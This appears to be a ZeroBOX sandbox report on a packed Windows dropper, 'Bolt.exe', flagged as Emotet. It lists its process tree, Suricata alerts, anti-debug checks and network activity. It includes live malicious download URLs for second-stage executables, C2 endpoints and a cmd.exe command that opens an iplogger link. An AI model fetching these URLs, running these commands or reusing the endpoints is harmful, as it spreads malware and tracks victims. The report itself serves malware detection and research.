Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Nov. 10, 2022, 9:46 a.m.	Nov. 10, 2022, 9:50 a.m.

Size	381.0KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`0c51d5838eaa310b8d009ab265c1846e`
SHA256	`1449e7a3111fdfb697c631367fcbc08eb0ab911bc280fd0c3d132cc3918d1da6`
CRC32	`7702B3E0`
ssdeep	`6144:x/QiQXCkkm+ksmpk3U9j0Iunb+OGBfj/WUplm6zIOYQNd28pTXdAmpCLVRZoglMb:pQi3kP6m6UR0IunClL//plmW9bTXeVh8`
Yara	Win32_Trojan_Emotet_2_Zero - Win32 Trojan Emotet IsPE32 - (no description) Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature UPX_Zero - UPX packed file

Bolt.exe "C:\Users\test22\AppData\Local\Temp\Bolt.exe"
2568
- Bolt.tmp "C:\Users\test22\AppData\Local\Temp\is-93H7L.tmp\Bolt.tmp" /SL5="$80178,140559,56832,C:\Users\test22\AppData\Local\Temp\Bolt.exe"
  2620
  - PowerOff.exe "C:\Users\test22\AppData\Local\Temp\is-2D1M1.tmp\PowerOff.exe" /S /UID=95
    2792
    - SHaedahaepahy.exe "C:\Users\test22\AppData\Local\Temp\70-d6d8b-65e-9938c-d92ff496b918b\SHaedahaepahy.exe"
      2116
    - Byqibuqyqa.exe "C:\Users\test22\AppData\Local\Temp\7c-440d3-728-fac9b-5a0261a9df152\Byqibuqyqa.exe"
      1356
      - iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
        2996
        
        iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2996 CREDAT:145409
        744
    - cmd.exe "C:\Windows\System32\cmd.exe" /c start https://iplogger.org/1RFfM4.psd
      2448
      - iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
        2764
        
        iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2764 CREDAT:145409
        204
explorer.exe C:\Windows\Explorer.EXE
1452

Name	Response	Post-Analysis Lookup
iplogger.org	A 148.251.234.83	148.251.234.83
apps.identrust.com	A 23.216.159.9 CNAME a1952.dscq.akamai.net A 23.216.159.81 CNAME identrust.edgesuite.net A 23.43.165.105 A 23.43.165.66	23.43.165.66
360devtracking.com	A 37.230.138.66	37.230.138.66
www.profitabletrustednetwork.com	A 173.233.137.36 A 173.233.137.52 A 192.243.59.20 A 192.243.61.225 A 192.243.59.12 A 192.243.61.227 A 192.243.59.13 A 173.233.137.60 A 173.233.139.164 A 173.233.137.44	192.243.61.227
nova-brothers.s3.pl-waw.scw.cloud	A 151.115.10.1 CNAME s3.pl-waw.scw.cloud	151.115.10.1
connectini.net	A 37.230.138.123	37.230.138.123
wewewe.s3.eu-central-1.amazonaws.com	CNAME s3-r-w.eu-central-1.amazonaws.com A 52.219.170.66	52.219.72.172
doll.s3.pl-waw.scw.cloud	A 151.115.10.1 CNAME s3.pl-waw.scw.cloud	151.115.10.1
160dd0af-5534-4369-972f-5aa0f99c9324.s3.pl-waw.scw.cloud	A 151.115.10.1 CNAME s3.pl-waw.scw.cloud	151.115.10.1
www.google.com	A 142.250.76.132	142.250.76.132
google.com	A 142.250.76.142	142.250.76.142

IP Address	Status	Action
185.213.208.196	Active	Moloch
142.250.76.132	Active	Moloch
142.250.76.142	Active	Moloch
148.251.234.83	Active	Moloch
151.115.10.1	Active	Moloch
164.124.101.2	Active	Moloch
173.233.137.36	Active	Moloch
23.216.159.9	Active	Moloch
23.43.165.105	Active	Moloch
23.43.165.66	Active	Moloch
37.230.138.123	Active	Moloch
37.230.138.66	Active	Moloch
52.219.170.66	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
UDP 192.168.56.101:59002 -> 164.124.101.2:53	2027865	ET INFO Observed DNS Query to .cloud TLD	Potentially Bad Traffic
UDP 192.168.56.101:55146 -> 164.124.101.2:53	2027865	ET INFO Observed DNS Query to .cloud TLD	Potentially Bad Traffic
UDP 192.168.56.101:61950 -> 164.124.101.2:53	2027865	ET INFO Observed DNS Query to .cloud TLD	Potentially Bad Traffic
TCP 192.168.56.101:49164 -> 151.115.10.1:80	2027874	ET INFO HTTP Request to Suspicious *.cloud Domain	Potentially Bad Traffic
TCP 192.168.56.101:49167 -> 37.230.138.123:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49170 -> 151.115.10.1:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49169 -> 151.115.10.1:80	2027874	ET INFO HTTP Request to Suspicious *.cloud Domain	Potentially Bad Traffic
UDP 192.168.56.101:53004 -> 164.124.101.2:53	2027865	ET INFO Observed DNS Query to .cloud TLD	Potentially Bad Traffic
TCP 192.168.56.101:49171 -> 151.115.10.1:80	2027874	ET INFO HTTP Request to Suspicious *.cloud Domain	Potentially Bad Traffic
TCP 192.168.56.101:49164 -> 151.115.10.1:80	2027874	ET INFO HTTP Request to Suspicious *.cloud Domain	Potentially Bad Traffic
TCP 151.115.10.1:80 -> 192.168.56.101:49164	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 192.168.56.101:49173 -> 151.115.10.1:80	2027874	ET INFO HTTP Request to Suspicious *.cloud Domain	Potentially Bad Traffic
TCP 151.115.10.1:80 -> 192.168.56.101:49169	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 151.115.10.1:80 -> 192.168.56.101:49169	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 151.115.10.1:80 -> 192.168.56.101:49171	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 151.115.10.1:80 -> 192.168.56.101:49171	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 151.115.10.1:80 -> 192.168.56.101:49173	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 151.115.10.1:80 -> 192.168.56.101:49173	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 192.168.56.101:49174 -> 151.115.10.1:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49215 -> 173.233.137.36:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49197 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.101:49197 -> 148.251.234.83:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49197 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.101:49199 -> 37.230.138.123:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49214 -> 173.233.137.36:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
UDP 192.168.56.101:52797 -> 164.124.101.2:53	2035948	ET POLICY IP Check Domain (iplogger .org in DNS Lookup)	Potential Corporate Privacy Violation
UDP 192.168.56.101:52797 -> 8.8.8.8:53	2035948	ET POLICY IP Check Domain (iplogger .org in DNS Lookup)	Potential Corporate Privacy Violation
TCP 192.168.56.101:49191 -> 142.250.76.132:80	2036303	ET HUNTING Terse Unencrypted Request for Google - Likely Connectivity Check	A Network Trojan was detected
TCP 192.168.56.101:49168 -> 52.219.170.66:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49196 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.101:49196 -> 148.251.234.83:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49196 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.101:49194 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.101:49194 -> 148.251.234.83:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49194 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 148.251.234.83:443 -> 192.168.56.101:49198	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.101:49193 -> 37.230.138.123:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49201 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.101:49201 -> 148.251.234.83:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49201 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.101:49201 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 148.251.234.83:443 -> 192.168.56.101:49178	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.101:49178 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.101:49178 -> 148.251.234.83:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49178 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.101:49195 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.101:49195 -> 148.251.234.83:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49195 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.101:49195 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.101:49201 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.101:49194 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.101:49178 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.101:49196 -> 148.251.234.83:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.101:49167 37.230.138.123:443	C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com	C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com	a9:58:92:78:d9:50:a8:fa:c0:a9:d2:11:99:c2:6d:53:0e:1f:6d:49
TLS 1.2 192.168.56.101:49170 151.115.10.1:443	C=US, O=Let's Encrypt, CN=R3	CN=s3.pl-waw.scw.cloud	13:5a:26:76:9b:02:b0:88:8d:ed:ac:89:e9:f3:d1:bd:f4:6d:ff:fd
TLS 1.2 192.168.56.101:49174 151.115.10.1:443	C=US, O=Let's Encrypt, CN=R3	CN=s3.pl-waw.scw.cloud	13:5a:26:76:9b:02:b0:88:8d:ed:ac:89:e9:f3:d1:bd:f4:6d:ff:fd
TLSv1 192.168.56.101:49215 173.233.137.36:443	C=US, O=Let's Encrypt, CN=R3	CN=profitabletrustednetwork.com	6a:48:45:b5:44:ae:75:f4:d2:b3:d4:5e:bc:2f:61:30:ec:d4:3a:99
TLSv1 192.168.56.101:49199 37.230.138.123:443	C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com	C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com	a9:58:92:78:d9:50:a8:fa:c0:a9:d2:11:99:c2:6d:53:0e:1f:6d:49
TLSv1 192.168.56.101:49214 173.233.137.36:443	C=US, O=Let's Encrypt, CN=R3	CN=profitabletrustednetwork.com	6a:48:45:b5:44:ae:75:f4:d2:b3:d4:5e:bc:2f:61:30:ec:d4:3a:99
TLS 1.2 192.168.56.101:49168 52.219.170.66:443	C=US, O=Amazon, OU=Server CA 1B, CN=Amazon	CN=*.s3.eu-central-1.amazonaws.com	bc:92:6b:62:48:5f:c5:08:60:03:a9:1e:bc:29:58:79:d7:4b:94:fb
TLSv1 192.168.56.101:49193 37.230.138.123:443	C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com	C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com	a9:58:92:78:d9:50:a8:fa:c0:a9:d2:11:99:c2:6d:53:0e:1f:6d:49

Queries for the computername (2 events)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW Nov. 10, 2022, 9:40 a.m.	computer_name: TEST22-PC	1	1	0
GetComputerNameW Nov. 10, 2022, 9:40 a.m.	computer_name: TEST22-PC	1	1	0

Checks if process is being debugged by a debugger (5 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Nov. 10, 2022, 9:46 a.m.			0	0
IsDebuggerPresent Nov. 10, 2022, 9:39 a.m.			0	0
IsDebuggerPresent Nov. 10, 2022, 9:39 a.m.			0	0
IsDebuggerPresent Nov. 10, 2022, 9:40 a.m.			0	0
IsDebuggerPresent Nov. 10, 2022, 9:40 a.m.			0	0

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Nov. 10, 2022, 9:46 a.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (3 events)

section	CODE
section	DATA
section	BSS

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ Nov. 10, 2022, 9:47 a.m.	stacktrace: bolt+0x816a8 @ 0x4816a8 bolt+0x99c13 @ 0x499c13 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xeedface exception.offset: 46887 exception.address: 0x7597b727 registers.esp: 1637924 registers.edi: 4523332 registers.eax: 1637924 registers.ebp: 1638004 registers.edx: 0 registers.ebx: 0 registers.esi: 2 registers.ecx: 7	1	0	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (14 events)

suspicious_features	GET method with no useragent header	suspicious_request	GET http://nova-brothers.s3.pl-waw.scw.cloud/four-spoon/up-da-b135l0bjgejx.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET http://nova-brothers.s3.pl-waw.scw.cloud/four-spoon/pub-b135l0bjgejx.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET http://nova-brothers.s3.pl-waw.scw.cloud/four-spoon/hand-b135l0bjgejx.exe
suspicious_features	POST method with no referer header, POST method with no useragent header	suspicious_request	POST http://360devtracking.com/ezzcbmueaa4iwhvb/fmovies
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.google.com/
suspicious_features	POST method with no referer header, POST method with no useragent header	suspicious_request	POST https://connectini.net/Series/SuperNitouDisc.php
suspicious_features	GET method with no useragent header	suspicious_request	GET https://wewewe.s3.eu-central-1.amazonaws.com/WeUninstalled.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET https://doll.s3.pl-waw.scw.cloud/widgets/powerOff.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET https://connectini.net/S2S/Disc/Disc.php?ezok=power2off2&tesla=8
suspicious_features	POST method with no referer header, POST method with no useragent header	suspicious_request	POST https://connectini.net/Series/Conumer4Publisher.php
suspicious_features	GET method with no useragent header	suspicious_request	GET https://connectini.net/Series/publisher/1/KR.json
suspicious_features	POST method with no referer header, POST method with no useragent header	suspicious_request	POST https://connectini.net/Series/Conumer2kenpachi.php
suspicious_features	GET method with no useragent header	suspicious_request	GET https://connectini.net/Series/kenpachi/2/goodchannel/KR.json
suspicious_features	GET method with no useragent header	suspicious_request	GET https://connectini.net/Series/configPoduct/2/goodchannel.json

Performs some HTTP requests (17 events)

request	HEAD http://160dd0af-5534-4369-972f-5aa0f99c9324.s3.pl-waw.scw.cloud/workflow/poweroff-1mo67u5vspq3.exe
request	GET http://160dd0af-5534-4369-972f-5aa0f99c9324.s3.pl-waw.scw.cloud/workflow/poweroff-1mo67u5vspq3.exe
request	GET http://nova-brothers.s3.pl-waw.scw.cloud/four-spoon/up-da-b135l0bjgejx.exe
request	GET http://nova-brothers.s3.pl-waw.scw.cloud/four-spoon/pub-b135l0bjgejx.exe
request	GET http://apps.identrust.com/roots/dstrootcax3.p7c
request	GET http://nova-brothers.s3.pl-waw.scw.cloud/four-spoon/hand-b135l0bjgejx.exe
request	POST http://360devtracking.com/ezzcbmueaa4iwhvb/fmovies
request	GET http://www.google.com/
request	POST https://connectini.net/Series/SuperNitouDisc.php
request	GET https://wewewe.s3.eu-central-1.amazonaws.com/WeUninstalled.exe
request	GET https://doll.s3.pl-waw.scw.cloud/widgets/powerOff.exe
request	GET https://connectini.net/S2S/Disc/Disc.php?ezok=power2off2&tesla=8
request	POST https://connectini.net/Series/Conumer4Publisher.php
request	GET https://connectini.net/Series/publisher/1/KR.json
request	POST https://connectini.net/Series/Conumer2kenpachi.php
request	GET https://connectini.net/Series/kenpachi/2/goodchannel/KR.json
request	GET https://connectini.net/Series/configPoduct/2/goodchannel.json

Sends data using the HTTP POST Method (4 events)

request	POST http://360devtracking.com/ezzcbmueaa4iwhvb/fmovies
request	POST https://connectini.net/Series/SuperNitouDisc.php
request	POST https://connectini.net/Series/Conumer4Publisher.php
request	POST https://connectini.net/Series/Conumer2kenpachi.php

Allocates read-write-execute memory (usually to unpack itself) (50 out of 717 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Nov. 10, 2022, 9:46 a.m.	process_identifier: 2568 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 10, 2022, 9:46 a.m.	process_identifier: 2568 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 40960 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00401000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 10, 2022, 9:46 a.m.	process_identifier: 2568 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 20480 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0040f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 10, 2022, 9:46 a.m.	process_identifier: 2568 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73bc2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 10, 2022, 9:46 a.m.	process_identifier: 2620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00350000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 10, 2022, 9:46 a.m.	process_identifier: 2620 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73bc2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 10, 2022, 9:40 a.m.	process_identifier: 1452 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000049a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 10, 2022, 9:39 a.m.	process_identifier: 2792 region_size: 2162688 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000850000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 10, 2022, 9:39 a.m.	process_identifier: 2792 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000009e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 10, 2022, 9:39 a.m.	process_identifier: 2792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3b11000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 10, 2022, 9:39 a.m.	process_identifier: 2792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef41ab000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 10, 2022, 9:39 a.m.	process_identifier: 2792 region_size: 1900544 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000020c0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 10, 2022, 9:39 a.m.	process_identifier: 2792 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002210000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 10, 2022, 9:39 a.m.	process_identifier: 2792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3b12000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 10, 2022, 9:39 a.m.	process_identifier: 2792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3b12000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 10, 2022, 9:39 a.m.	process_identifier: 2792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3b12000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 10, 2022, 9:39 a.m.	process_identifier: 2792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3b12000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 10, 2022, 9:39 a.m.	process_identifier: 2792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3b12000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 10, 2022, 9:39 a.m.	process_identifier: 2792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3b12000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 10, 2022, 9:39 a.m.	process_identifier: 2792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3b12000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 10, 2022, 9:39 a.m.	process_identifier: 2792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3b12000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 10, 2022, 9:39 a.m.	process_identifier: 2792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3b12000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 10, 2022, 9:39 a.m.	process_identifier: 2792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3b12000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 10, 2022, 9:39 a.m.	process_identifier: 2792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3b12000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 10, 2022, 9:39 a.m.	process_identifier: 2792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3b14000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 10, 2022, 9:39 a.m.	process_identifier: 2792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3b14000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 10, 2022, 9:39 a.m.	process_identifier: 2792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3b14000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 10, 2022, 9:39 a.m.	process_identifier: 2792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3b14000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 10, 2022, 9:39 a.m.	process_identifier: 2792 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 10, 2022, 9:39 a.m.	process_identifier: 2792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 10, 2022, 9:39 a.m.	process_identifier: 2792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 10, 2022, 9:39 a.m.	process_identifier: 2792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 10, 2022, 9:39 a.m.	process_identifier: 2792 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
